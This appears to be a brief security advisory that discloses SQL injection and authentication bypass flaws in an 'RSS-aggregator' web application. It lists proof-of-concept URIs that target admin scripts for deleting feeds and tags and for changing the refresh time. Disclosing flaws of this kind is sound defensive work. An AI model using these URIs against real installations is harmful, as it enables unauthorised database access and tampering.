RSS-aggregator Multiple SQL Injection And Authentication Bypass Vulnerabilities

RSS-aggregator Multiple SQL Injection And Authentication Bypass Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/admin/fonctions/supprimer_flux.php?IdFlux=[SQL injection]
http://www.example.com/admin/fonctions/supprimer_tag.php?IdTag=[SQL injection]
http://www.example.com/admin/fonctions/supprimer_flux.php?IdFlux=5
http://www.example.com/admin/fonctions/modifier_tps_rafraich.php?TpsRafraich=500